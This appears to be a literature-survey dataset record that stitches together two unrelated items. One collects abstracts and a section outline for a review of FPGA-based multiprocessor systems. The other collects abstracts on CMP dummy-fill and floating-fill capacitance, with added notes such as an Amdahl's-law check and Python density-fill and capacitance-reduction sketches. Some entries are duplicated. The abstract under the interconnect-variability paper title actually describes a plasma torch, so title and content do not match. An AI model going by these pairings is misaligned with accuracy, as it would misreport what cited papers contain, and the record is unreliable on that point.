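The measured speed-ups of 1.7 (two slaves) and 2.3 (three slaves) are roughly what Amdahl's law predicts for a partially serial encoder; the following back-of-the-envelope check is ours, not the authors':

S(n) = \frac{1}{(1 - p) + p/n}, \qquad S(2) = 1.7 \;\Rightarrow\; p = 2\,(1 - 1/1.7) \approx 0.82, \qquad S(3) \approx \frac{1}{0.18 + 0.82/3} \approx 2.2,

which is close to the observed value of 2.3.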
--- paper_title: Advantages of FPGA-based multiprocessor systems in industrial applications paper_content: Today, industrial production machines must be highly flexible in order to competitively account for dynamic and unforeseen changes in the product demands. This paper shows that field-programmable gate arrays (FPGAs) are especially suited to fulfil these requirements; FPGAs are very powerful, relatively inexpensive, and adaptable, since their configuration is specified in an abstract hardware description language. In addition to the benefits resulting from using an FPGA, the case study presented here shows how FPGAs can be used for implementing a sophisticated multiprocessor architecture. In the course of presentation, this paper furthermore argues that due to the excellent tool support and the availability of reusable functional modules (also known as intellectual properties) this approach can be adopted by almost any industrial hardware designer. --- paper_title: An MPSoC architecture for the Multiple Target Tracking application in driver assistant system paper_content: This article discusses the design of an application specific MPSoC architecture dedicated to multiple target tracking (MTT). This application has its utility in driver assistant systems, more precisely in collision avoidance and warning systems. An automotive-radar is used as the front end sensor in our application. The article examines the tradeoffs that must be taken into consideration in the realization of the entire MTT application in an embedded system. In our implementation of MTT, several independent parallel tasks have been identified and mapped onto a multiprocessor architecture to ensure the deadlines imposed by the application. Our study demonstrates that the joint utilization of reconfigurable circuits (namely FPGA) and MPSoC, facilitates the development of a flexible and efficient MTT system. --- paper_title: Symmetric Multiprocessing on Programmable Chips Made Easy paper_content: Vendor-provided softcore processors often support advanced features such as caching that work well in uniprocessor or uncoupled multiprocessor architectures. However, it is a challenge to implement symmetric multiprocessor on a programmable chip (SMPoPC) systems using such processors. This paper presents an implementation of a tightly coupled, cache-coherent symmetric multiprocessing architecture using a vendor-provided softcore processor. Experimental results show that this implementation can be achieved without invasive changes to the vendor-provided softcore processor and without degradation of the performance of the memory system. --- paper_title: Star-Wheels Network-on-Chip featuring a self-adaptive mixed topology and a synergy of a circuit - and a packet-switching communication protocol paper_content: Multiprocessor System-on-Chip is a promising realization alternative for the next generation of computing architectures providing the required data processing performance in high performance computing applications. Numerous scientists from industry and academic institutions investigate and develop novel processing elements and accelerators as can be seen in real devices like IBM's Cell or nVIDIA's Tesla GPU. Nevertheless, the on-chip communication of these multiple processor elements has to be optimized tailored to the actual requirement of the data to be processed. 
Network-on-Chip (NoC), Bus-based or even heterogeneous communication on chip often suffer from the fact of being inflexible due to their fixed physical realization. This paper presents a novel approach for a NoC, exploiting circuit-and packed-switched communication as well as a run-time adaptive and heterogeneous topology. An application scenario from image processing exploiting the implemented NoC on an FPGA delivers results like performance data and hardware costs. --- paper_title: Exploring FPGA Capabilities for Building Symmetric Multiprocessor Systems paper_content: Advances in FPGA technologies allow designing highly complex systems using on-chip FPGA resources and intellectual property (IP) cores. Furthermore, it is possible to build multiprocessor systems using hard-core or soft-core processors increasing the range of applications that can be implemented on an FPGA. This paper presents an implementation of a symmetric multiprocessor (SMP) system on an FPGA using a vendor provided soft-core processor and a new set of software libraries specially developed for writing applications for this kind of systems. Experimental results show how this approach can improve performance of parallelizable software applications. --- paper_title: Efficient Automated Synthesis, Programing, and Implementation of Multi-Processor Platforms on FPGA Chips paper_content: Emerging embedded System-on-Chip (SoC) platforms are increasingly becoming multiprocessor architectures. The advances in the FPGA chip technology make the implementation of such architectures in a single chip feasible and very appealing. Although the FPGA chip technology is well developed by companies such as Xilinx and Altera, the concepts and the necessary tool support for building multiprocessor systems on a single FPGA chip are still not mature enough. As a consequence, system designers experience significant difficulties in 1) designing multiprocessor systems on FPGAs in a short amount of time and 2) programming such systems in order to satisfy the performance needs of applications executed on them. In this paper we present our concept for multiprocessor system design, programing, and implementation that addresses and solves the above two problems in a particular way. We have implemented the concept in a tool called ESPAM which is briefly introduced as well. Also, we present some results obtained by applying our concept and ESPAM tool to automatically generate multiprocessor systems that execute a real-life application, namely a Motion-JPEG encoder. --- paper_title: An automated exploration framework for FPGA-based soft multiprocessor systems paper_content: FPGA-based soft multiprocessors are viable system solutions for high performance applications. They provide a software abstraction to enable quick implementations on the FPGA. The multiprocessor can be customized for a target application to achieve high performance. Modern FPGAs provide the capacity to build a variety of micro-architectures composed of 20-50 processors, complex memory hierarchies, heterogeneous interconnection schemes and custom co-processors for performance critical operations. However, the diversity in the architectural design space makes it difficult to realize the performance potential of these systems. In this paper we develop an exploration framework to build efficient FPGA multiprocessors for a target application. 
Our main contribution is a tool based on Integer Linear Programming to explore micro-architectures and allocate application tasks to maximize throughput. Using this tool, we implement a soft multiprocessor for IPv4 packet forwarding that achieves a throughput of 2 Gbps, surpassing the performance of a carefully tuned hand design. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-28OO network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: Multiprocessor systems synthesis for multiple use-cases of multiple applications on FPGA paper_content: Future applications for embedded systems demand chip multiprocessor designs to meet real-time deadlines. The large number of applications in these systems generates an exponential number of use-cases. The key design automation challenges are designing systems for these use-cases and fast exploration of software and hardware implementation alternatives with accurate performance evaluation of these use-cases. These challenges cannot be overcome by current design methodologies which are semiautomated, time consuming, and error prone. ::: In this article, we present a design methodology to generate multiprocessor systems in a systematic and fully automated way for multiple use-cases. Techniques are presented to merge multiple use-cases into one hardware design to minimize cost and design time, making it well suited for fast design-space exploration (DSE) in MPSoC systems. Heuristics to partition use-cases are also presented such that each partition can fit in an FPGA, and all use-cases can be catered for. ::: The proposed methodology is implemented into a tool for Xilinx FPGAs for evaluation. The tool is also made available online for the benefit of the research community and is used to carry out a DSE case study with multiple use-cases of real-life applications: H263 and JPEG decoders. The generation of the entire design takes about 100 ms, and the whole DSE was completed in 45 minutes, including FPGA mapping and synthesis. The heuristics used for use-case partitioning reduce the design-exploration time elevenfold in a case study with mobile-phone applications. ---
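A minimal version of the throughput-oriented ILP used in these exploration frameworks can be written as a makespan-style assignment problem. The formulation below is a simplified sketch of that idea; the actual tools also model memories, on-chip links and custom co-processors:

\min\; T \quad \text{s.t.} \quad \sum_{p} x_{t,p} = 1 \;\;\forall t, \qquad \sum_{t} c_t\, x_{t,p} \le T \;\;\forall p, \qquad x_{t,p} \in \{0,1\},

where x_{t,p} assigns task t to processor p, c_t is the per-packet (or per-frame) cycle cost of task t, and the achieved throughput for a pipelined mapping is roughly f_clk / T.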
Title: Reconfigurable Multiprocessor Systems: A Review Section 1: Introduction Description 1: Introductory background on the evolution and significance of MPSoC, highlighting the transition to FPGA-based multiprocessor designs. Section 2: Viability of FPGA-Based Multiprocessor Systems Description 2: Discussion on the advantages, challenges, and specific use cases where FPGA-based multiprocessor systems are beneficial. Section 3: FPGA-Based Multiprocessor Systems Description 3: Several examples of FPGA-based multiprocessor systems implemented by the research community. Section 4: Architecture Background Description 4: Overview of target application architectures for FPGA-based multiprocessor systems, including Master-Slave, Pipeline, and Net architectures. Section 5: Classification Description 5: Traditional classification of MPSoCs into homogeneous and heterogeneous systems and shared-memory versus distributed-memory systems. Section 6: Heterogeneous FPGA-Based Systems Description 6: Detailed examples and case studies of application-specific FPGA-based multiprocessor systems and their architectures. Section 7: Homogeneous FPGA-Based Systems Description 7: Examples and benefits of homogeneous multiprocessor systems, along with comparisons to heterogeneous systems. Section 8: Run-Time Reconfigurable Systems Description 8: Exploration of run-time reconfigurability in multiprocessor systems and new taxonomies for these systems. Section 9: Design Challenges Description 9: Critical issues in FPGA-based multiprocessor design, including resource limitations, synchronization, cache coherency, and on-chip communication. Section 10: Design Methodology Description 10: Two methodologies for building multiprocessor systems in FPGA: hand-tuned design and automatic synthesis design, along with their respective benefits and limitations. Section 11: Conclusion Description 11: Summary of the survey findings, major challenges, and future directions in FPGA-based multiprocessor system design.
CMP Fill Synthesis: A Survey of Recent Studies
7
--- paper_title: DFM: linking design and manufacturing paper_content: Until the move to the 130nm node, yield was an issue only for product engineers and engineers on the production line. Design engineers did not need to think explicitly about yield, or understand the manufacturing process. Beginning at the 130nm node, yield has become more problematic, and the defect mechanisms that contribute to yield loss are very different. Where random defects used to be dominant, we now have defects due to lithographic issues, and pattern (or design) dependent issues. This paper explains how these latter defect mechanisms differ from random defects and how and why the design engineer needs to become involved to mitigate the problem. On the lithography topic, this paper briefly examines techniques such as OPC (optical proximity correction) and PSM (phase shift masking), and explain their design and yield impact. We also examine issues such as dummy metal fill for CMP, redundant via insertion, as ways to mitigate pattern dependent yield issues. --- paper_title: The Physical and Electrical Effects of Metal-Fill Patterning Practices for Oxide Chemical-Mechanical Polishing Processes paper_content: In oxide chemical-mechanical polishing (CMP) processes, layout pattern dependent variation in the interlevel dielectric (ILD) thickness can reduce yield and impact circuit performance. Metal-fill patterning practices have emerged as a technique for substantially reducing layout pattern dependent ILD thickness variation. We present a generalizable methodology for selecting an optimal metal-fill patterning practice with the goal of satisfying a given dielectric thickness variation specification while minimizing the added interconnect capacitance associated with metal-fill patterning. Data from two industrial-based experiments demonstrate the beneficial impact of metal-fill on dielectric thickness variation, a 20% improvement in uniformity in one case and a 60% improvement in the other case, and illustrate that pattern density is the key mechanism involved. The pros and cons of two different metal-fill patterning practices-grounded versus floating metal-are explored. Criteria for minimizing the effect of floating or grounded metal-fill patterns on delay or crosstalk parameters are also developed based on canonical metal-fill structures. Finally, this methodology is illustrated using a case study which demonstrates an 82% reduction in ILD thickness variation. --- paper_title: Chemical processes in glass polishing paper_content: Abstract Chemical processes which occur during glass polishing are reviewed within the context of current mechanical models for the polishing process. The central chemical process which occurs is the interaction of both the glass surface and the polishing particle with water. A detailed mechanico-chemical model for the polishing process is proposed. --- paper_title: Implementation of CMP-based design rules and patterning practices paper_content: This paper discusses specific die patterning techniques utilized during the implementation of a CMP-based BEOL within Digital's Alpha technologies. Customary application of inter-level dielectric (ILD) CMP, to eliminate topographically induced defect mechanisms and increase photolithographic focal budget margins for Alpha, indicated the need to strictly control both interand intra-die dielectric capacitance and thickness. 
To this end, several die patterning strategies were used to minimize the feature size and pattern density dependencies of ILD CMP as well as aid in the fast-paced evolution from test vehicle to product chip reticles. Quantification of inter-level and intra-die thickness control with respect to ghost/partial die patterning, zero level (ZL) and perimeter bordering, dummy/filler feature patterning and general CMP-based design rules will be addressed within the context of analysis of variance (ANOVA). Further discussed will be the empirical rules-of-thumb and critical dimension (CD) variance definitions which provided the planarity targets utilized throughout the framework of these experiments. --- paper_title: Using Smart Dummy Fill And Selective Reverse Etchback For Pattern Density Equalization paper_content: The techniques of dummy fill and reverse etchback are often used prior to a chemical mechanical polishing (CMP) process to prevent film pattern density mismatches that lead to post-CMP film thickness variation. In this work, we present a methodology that utilizes both techniques in an intelligent fashion, and shows that both techniques can be used together to create a better balance of pattern densities than each technique can do separately. We introduce the idea of a selective reverse etchback method to lower the pattern density in high-density regions, and smart dummy fill to raise pattern densities in low-density regions. We then verify the methodology on the STI active area layer of a test mask. --- paper_title: Effects of slurry flow rate and pad conditioning temperature on dishing, erosion, and metal loss during copper CMP paper_content: The effect of slurry flow rate, pad surface temperature, and temperature during the pad conditioning process on surface tribology and pattern-related defects like dishing, erosion, and metal loss was studied. Experimental results suggest that dishing and erosion levels decreased with increase in slurry flow rate. Conditioning experiments at various temperatures revealed a significant impact of temperature on the effectiveness of the conditioning process and also on subsequent polishing performance. The polishing pad was conditioned more aggressively at lower temperatures compared to conditioning at elevated temperatures. The removal rate and coefficient of friction were found to be significantly affected by the pad surface temperature. The amount of dishing increased with increase in pad surface temperature and the uniformity of polishing. The study ascertains a correlation between process parameters and the extent of planarity defects. This study also demonstrates the use of a modified bench-top chemical mechanical polish (CMP) tester and a large-stage atomic force microscope with an automatic multiscan imaging procedure. --- paper_title: Integration of chemical-mechanical polishing into CMOS integrated circuit manufacturing paper_content: Planarization by chemical-mechanical polishing (CMP) has been exploited by IBM in the development and manufacture of CMOS products since 1985. Among the products that use this technology are the 4-Mbit DRAM (which uses polysilicon, oxide, tungsten-line and tungsten-stud planarization) and its logic family (which uses four oxide and four tungsten-stud planarization steps). CMP is also used in the planarization of oxide shallow isolation trenches, as in the 16-Mbit DRAM. Reduced sensitivity to many types of defects is possible with CMP.
A wafer that is truly flat is easier to clean, eliminates step coverage concerns, provides for better photolithographic and dry etch yields, and generally minimizes complications from prior level structures. Oxide CMP reduces sensitivity to certain pre-existing defects, such as crystalline inclusions or foreign material in an interlevel dielectric. Metal CMP can reduce the incidence of intralevel shorts relative to conventional RIE processing. Random defects associated with CMP, such as slurry residues and mechanical damage, are controlled by careful optimization of the post-polish clean and of the polish process itself. Systematic defects, such as incomplete planarization over very large structures, are controlled by process optimization and prudent design limitations. These include such things as constraints on the image size, the distance between images, and/or the local pattern density. Since its introduction in the 4-Mbit DRAM, there has been a steady increase in the use of chemical-mechanical polishing in IBM CMOS products. The number of steps, processes and materials polished continues to rise, both in current and planned future products. Individual applications range from the simple removal of back-side films to complex insulator or metal planarization requiring high removal uniformity. The process tolerances delivered by CMP have decreased faster than image size, even in the face of dramatic increases in circuit and layout complexity. CMP tools are installed in IBM semiconductor manufacturing and development sites worldwide. Chemical-mechanical polish processes and applications provide unique leverage to IBM products, and are a crucial part of both current and planned IBM CMOS technologies. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps, notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP), have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features on a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process.
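The window-density formulation above (keep the feature density of every window within prescribed bounds) can be illustrated with a small sketch. The Python below is a simplified stand-in, not the algorithms of the paper: it checks only non-overlapping windows and inserts fill greedily at the first empty sites, whereas real flows use overlapping windows, spacing rules and smarter fill placement.

import numpy as np

def window_densities(layout, w):
    # Feature density of each non-overlapping w-by-w window of a 0/1 layout grid
    # (assumes the grid dimensions are divisible by w).
    h, wd = layout.shape
    return layout.reshape(h // w, w, wd // w, w).mean(axis=(1, 3))

def fill_to_lower_bound(layout, w, rho_min):
    # Greedily add fill (1s) on empty sites of any window whose density is below rho_min.
    out = layout.copy()
    dens = window_densities(out, w)
    for i, j in np.argwhere(dens < rho_min):
        win = out[i*w:(i+1)*w, j*w:(j+1)*w]
        need = int(np.ceil((rho_min - win.mean()) * w * w))
        empty = np.argwhere(win == 0)[:need]          # first available fill sites
        win[empty[:, 0], empty[:, 1]] = 1             # insert dummy features
    return out

rng = np.random.default_rng(0)
chip = (rng.random((64, 64)) < 0.15).astype(int)      # sparse toy layout
filled = fill_to_lower_bound(chip, w=16, rho_min=0.25)
print(window_densities(chip, 16).min(), window_densities(filled, 16).min())

The minimum window density of the filled layout meets the lower bound, which is the basic feasibility condition the more sophisticated min-variance and slotting formulations build on.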
--- paper_title: Spin-On Glass: Materials and Applications in Advanced IC Technologies paper_content: This thesis deals with the study of shallow PN junction formation by dopant diffusion from Spin-On Glass (SOG) for future deep sub-micron BiCMOS technology. With the advantages of no transient enhanced diffusion and no metal contamination, diffusion from highly doped SOG (also called spin-on dopant - SOD) is a good technology for shallow junction formation. In this thesis, diffusion of impurities from SOD into Si and polysilicon on silicon structure has been studied. This shallow junction formation technique using SOD has been applied in realisation of two important devices, i.e. high frequency bipolar transistor and deep sub-micron elevated source/drain MOSFET. --- paper_title: Handbook of VLSI microlithography : principles, technology, and applications paper_content: Issues and Trends Affecting Lithography Tool Selection Strategy Resist Technology u Design, Processing, and Applications Lithography Process Monitoring and Defect Detection Techniques and Tools for Photo Metrology Techniques and Tools for Optical Lithography Microlithography Tool Automation Electron-Beam ULSI Applications Rational Vibration and Structural Dynamics for Lithographic Tool Installations Applications of Ion Microbeams Lithography and Direct Processing X-Ray Lithography Part I Part II Acknowledgment References Index --- paper_title: Arrhenius Characterization of ILD and Copper CMP Processes paper_content: To date, chemical mechanical planarization (CMP) models have relied heavily on parameters such as pressure, velocity, slurry, and pad properties to describe material removal rates. One key parameter, temperature, which can impact both the mechanical and chemical facets of the CMP process, is often neglected. Using a modified definition of the generalized Preston's equation with the inclusion of an Arrhenius relationship, thermally controlled polishing experiments are shown to quantify the contribution of temperature to the relative magnitude of the thermally dependent and thermally independent aspects of copper and interlayer dielectric (ILD) CMP. The newly defined Preston's equation includes a modified definition of the activation energy parameter contained in the Arrhenius portion, the combined activation energy, which describes all events (chemical or mechanical) that are impacted by temperature during CMP. Studies indicate that for every consumable set combination (i.e., slurry and polishing pad) a characteristic combined Arrhenius activation energy can be calculated for each substrate material being polished. --- paper_title: Modeling of chemical mechanical polishing for shallow trench isolation paper_content: Chemical mechanical polishing (CMP) is a key process enabling shallow trench isolation (STI), which is used in current integrated circuit manufacturing processes to achieve device isolation. Excessive dishing and erosion in STI CMP processes, however, create device yield concerns. This thesis proposes characterization and modeling techniques to address a variety of concerns in STI CMP. Three major contributions of this work are: characterization and modeling of STI CMP processes, both conventional and nonconventional; layout optimization to reduce pattern-dependent dishing and erosion; and modeling of wafer nanotopography impact on STI CMP yield. 
An STI CMP characterization method is combined with a chip-scale pattern-dependent model to create a methodology that enables tuning of STI CMP process models and prediction of post-CMP dishing, erosion, and clearing times on arbitrary layouts. Model extensions enable characterization of STI CMP processes that use nonconventional consumable sets, including fixed abrasive pads and high-selectivity silica-based and ceria-based slurries. Experimental data validates the accuracy of the model for both conventional and nonconventional processes. Layout optimization techniques are developed that reduce pattern-density dependent dishing and erosion. Layout design modification is achieved through the use of dummy STI active areas and selective reverse etchback structures. Smart algorithms allow for optimal density distributions across the layout. The effect of wafer nanotopography (height variations that exist on unpatterned silicon wafers) is explored, characterized, and modelled. A diagnostic tool for examining the impact of nanotopography on STI device yields is developed, based on contact wear modeling. An aggregate estimator for the combined effect of wafer-scale nanotopography and chip-scale pattern-dependent dishing and erosion is developed. The techniques developed in this thesis can be used both for process optimization and for diagnosis and correction of potential problems due to layout, wafer and CMP process interaction. The characterization and modeling methods create a comprehensive set of tools for process characterization and post-CMP erosion and dishing prediction in STI processes. --- paper_title: Effect of Slurry Flow Rate on Tribological, Thermal, and Removal Rate Attributes of Copper CMP paper_content: Chemical mechanical polishing of copper is examined experimentally and theoretically as a function of slurry flow rate and the product of applied wafer pressure and relative sliding speed (p × V). It is observed that under constant tribological conditions, the removal rate at any fixed value of p × V generally decreases as slurry flow rate increases. The increased cooling of the wafer surface, as a result of increased slurry flow rate, is used to explain this reduction in the reaction rate. At a fixed flow rate, it is further observed that removal rate does not necessarily increase monotonically with p × V. The rate instead depends on the particular values of pressure and velocity, regardless of the fact that they may result in the same value of p × V. This dependence is shown to be caused by changes in the coefficient for convective heat-transfer between the wafer and the slurry, as well as the heat partition factor, which determines the fraction of the total frictional power that heats the wafer. Results further indicate that trends in copper removal rate can be adequately explained with a Langmuir-Hinshelwood kinetics model with both mechanical and chemical rate components. --- paper_title: Rapid characterization and modeling of pattern-dependent variation in chemical-mechanical polishing paper_content: Pattern-dependent effects are a key concern in chemical-mechanical polishing (CMP) processes. In oxide CMP, variation in the interlevel dielectric (ILD) thickness across each die and across the wafer can impact circuit performance and reduce yield.
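For reference, the removal-rate models invoked in the CMP abstracts above are commonly written as a Preston term scaled by a thermally activated factor; the exact parameterization used in these studies may differ:

\mathrm{MRR} = K_p\, p\, V \quad\longrightarrow\quad \mathrm{MRR} = \bigl(K_1 + K_2\, e^{-E_a/(k_B T)}\bigr)\, p\, V,

where p is the applied pressure, V the relative pad-wafer velocity, E_a the combined activation energy and T the interface temperature; K_1 collects the thermally independent (mechanical) contribution and K_2 the thermally dependent one.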
In this work, we present new test mask designs and associated measurement and analysis methods to efficiently characterize and model polishing behavior as a function of layout pattern factors, specifically area, pattern density, pitch, and perimeter/area effects. An important goal of this approach is rapid learning, which requires rapid data collection. While the masks are applicable to a variety of CMP applications including back-end, shallow-trench, or damascene processes, in this study we focus on a typical interconnect oxide planarization process, and compare the pattern-dependent variation models for two different polishing pads. For the process and pads considered, we find that pattern density is a strongly dominant factor, while structure area, pitch, and perimeter/area (aspect ratio) play only a minor role. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps, notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP), have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features on a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Study of Floating Fill Impact on Interconnect Capacitance paper_content: It is well known that fill insertion adversely affects total and coupling capacitance of interconnects. While grounded fill can be extracted by full-chip extractors, floating fill can be reliably extracted by 3D field solvers only.
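Because pattern density is the dominant layout factor, chip-scale CMP models usually replace the raw local density with an effective density obtained by convolving the layout density map with a planarization weighting window. The Python below is a generic sketch of that step with an assumed Gaussian-like kernel; it is not the specific model or window shape fitted in these papers.

import numpy as np

def effective_density(rho, plen, cell):
    # Convolve a local density map rho (2-D grid, cell um per pixel) with a
    # circularly symmetric weighting window of planarization length plen (um).
    r = int(plen / cell)
    y, x = np.ogrid[-r:r + 1, -r:r + 1]
    w = np.exp(-(x**2 + y**2) * (cell / plen) ** 2)   # assumed kernel shape
    w /= w.sum()
    pad = np.pad(rho, r)                               # zero-padded borders
    out = np.empty_like(rho, dtype=float)
    for i in range(rho.shape[0]):                      # brute-force 2-D convolution
        for j in range(rho.shape[1]):
            out[i, j] = (pad[i:i + 2*r + 1, j:j + 2*r + 1] * w).sum()
    return out

rho = (np.random.default_rng(1).random((40, 40)) < 0.3).astype(float)
print(effective_density(rho, plen=100.0, cell=10.0).round(2).max())

In simple density models, post-CMP oxide thickness over raised features then tracks the inverse of this effective density to first order, which is what makes density-equalizing fill effective.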
We analyze the effect of fill configuration parameters such as fill size, fill location, interconnect width, interconnect spacing, etc., and consider edge effects and effects occurring due to insertion of several fill geometries in close proximity. Based on our findings, we propose certain guidelines to achieve high metal density while having smaller impact on interconnect capacitance. Finally, we validate the proposed guidelines using representative process parameters and a 3D field solver. On average, the coupling capacitance increase due to floating-fill insertion decreases by ~53% when using the proposed guidelines. --- paper_title: Variability-driven considerations in the design of integrated-circuit global interconnects paper_content: A torch with a turbulized supply of a plasma forming gas comprises an electrode having a high-melting insert and a flat end face, and a nozzle with an internal surface having two mated portions: one cylindrical and one tapering; and the diameter of the electrode flat end face amounts essentially to 0.4-0.5 diameter of the electrode proper and the radius of conjugation of the nozzle cylindrical and tapering portions is equal essentially to the length of its cylindrical portion. Due to such a design, the inventive torch features a long service life of both the electrode and the nozzle. --- paper_title: Dummy filling methods for reducing interconnect capacitance and number of fills paper_content: In recent system-on-chip (SoC) designs, floating dummy metals inserted for planarization have created serious problems because of increased interconnect capacitance and the enormous amount of fill required. We present new methods to reduce the interconnect capacitance and the amount of dummy metals needed. These techniques include three ways of filling: (1) improved floating square fills, (2) floating parallel lines, and (3) floating perpendicular lines (with spacing between dummy metals above and below signal lines). We also present efficient simple formulas for estimating the appropriate spacing and number of fills. In our experiments, the capacitance increase using the traditional regular square method was 13.1%, while that using the methods of improved square fills, extended parallel lines, and perpendicular lines was 2.5%, 2.4%, and 1.1%, respectively. Moreover, the number of necessary dummy metals can be reduced by two orders of magnitude through use of the parallel line method. --- paper_title: A novel CBCM method free from charge injection induced errors: investigation into the impact of floating dummy-fills on interconnect capacitance paper_content: Starting from CIEF (charge injection induced errors) CBCM (charge-based capacitance measurement), a novel CBCM method free from the errors induced by charge-injection is developed. This is used for the first time to investigate the impact of floating dummy-fills on interconnect capacitance in practice. The impact of floating dummy-fills is confirmed to play an important role in successful circuit design. Besides, a guideline to optimize the chip performance and minimize the crosstalk by dummy pattern design is also proposed in this paper. --- paper_title: Study of Floating Fill Impact on Interconnect Capacitance paper_content: It is well known that fill insertion adversely affects total and coupling capacitance of interconnects. While grounded fill can be extracted by full-chip extractors, floating fill can be reliably extracted by 3D field solvers only.
Due to poor understanding of the impact of floating fill on capacitance, designers insert floating fill conservatively. In this paper we study the impact of floating fill insertion on coupling and total capacitance when the fill geometry and both the interconnects between which the capacitance is measured are on the same layer. We show that the capacitance with same-layer neighboring interconnects is a large fraction of total capacitance, and that it is significantly affected by fill geometries on the same layer. We analyze the effect of fill configuration parameters such as fill size, fill location, interconnect width, interconnect spacing, etc., and consider edge effects and effects occurring due to insertion of several fill geometries in close proximity. Based on our findings, we propose certain guidelines to achieve high metal density while having smaller impact on interconnect capacitance. Finally, we validate the proposed guidelines using representative process parameters and a 3D field solver. On average, the coupling capacitance increase due to floating-fill insertion decreases by ~53% when using the proposed guidelines. --- paper_title: Analyzing the effects of floating dummy-fills: from feature scale analysis to full-chip RC extraction paper_content: Studies the effects of dummy-fills on the interconnect capacitance and the global planarity of chips in order to provide the design guideline of the dummy-fills. A simple but accurate full-chip RC extraction methodology taking the floating dummy-fills into account is proposed and applied to the analysis of changes in capacitance and signal delay of the global interconnects, for the first time. The results for 0.18 µm designs clearly demonstrate the importance of considering floating dummy-fills in the interconnect modeling and the full-chip RC extraction. --- paper_title: A statistical method for fast and accurate capacitance extraction in the presence of floating dummy fills paper_content: Dummy fills are being extensively used to enhance CMP planarity. However, the presence of these fills can have a significant impact on the values of interconnect capacitances. Accurate capacitance extraction accounting for these dummies is CPU intensive and cumbersome. For one, there are typically hundreds to thousands of dummy fills in a small layout region, which stress the general-purpose capacitance extractor. Second, since these dummy fills are not introduced by the designers, it is of no interest for them to see the capacitances to dummy fills in the extraction reports; they are interested in equivalent capacitances associated with signal, power, and ground nets. Hence extracting equivalent capacitances across nets of interest in the presence of a large number of dummy fills is an important and challenging problem. We present a novel extension to the widely popular Monte-Carlo capacitance extraction technique. Our extension handles the dummy fills efficiently. We demonstrate the accuracy and scalability of our approach by two methods: (i) the classical and golden technique of finding equivalent interconnect capacitances by eliminating dummy fills through the network reduction method, and (ii) comparing extracted capacitances with measurement data from a test chip.
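The "network reduction" baseline mentioned in the entry above - folding floating dummy-fill conductors into equivalent capacitances between the nets of interest - can be illustrated with a small linear-algebra sketch. The sketch below is ours, not the authors' implementation: it only assumes the usual zero-net-charge condition for a floating conductor, and the function name, index sets, and toy matrix are hypothetical.

import numpy as np

def reduce_floating_fill(C, signal_idx, float_idx):
    """Fold floating dummy-fill nodes into an equivalent capacitance matrix.

    C          : (n, n) symmetric Maxwell capacitance matrix (Q = C @ V)
    signal_idx : indices of signal/power/ground nodes that are kept
    float_idx  : indices of floating fill nodes to eliminate

    A floating conductor carries no net charge, so Q_f = 0 gives
    V_f = -inv(C_ff) @ C_fs @ V_s, and the kept nodes see the
    Schur complement C_ss - C_sf @ inv(C_ff) @ C_fs.
    """
    C = np.asarray(C, dtype=float)
    C_ss = C[np.ix_(signal_idx, signal_idx)]
    C_sf = C[np.ix_(signal_idx, float_idx)]
    C_fs = C[np.ix_(float_idx, signal_idx)]
    C_ff = C[np.ix_(float_idx, float_idx)]
    return C_ss - C_sf @ np.linalg.solve(C_ff, C_fs)

# Toy example: two signal wires (nodes 0, 1) coupled through one floating fill shape (node 2).
C = np.array([[ 5.0, -1.0, -2.0],
              [-1.0,  5.0, -2.0],
              [-2.0, -2.0,  6.0]])
print(reduce_floating_fill(C, [0, 1], [2]))

In this toy case the effective coupling term between the two signal nodes grows in magnitude (from -1.0 to about -1.67) once the floating node is folded in, which is consistent with the qualitative observations about floating fill in the surrounding entries.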
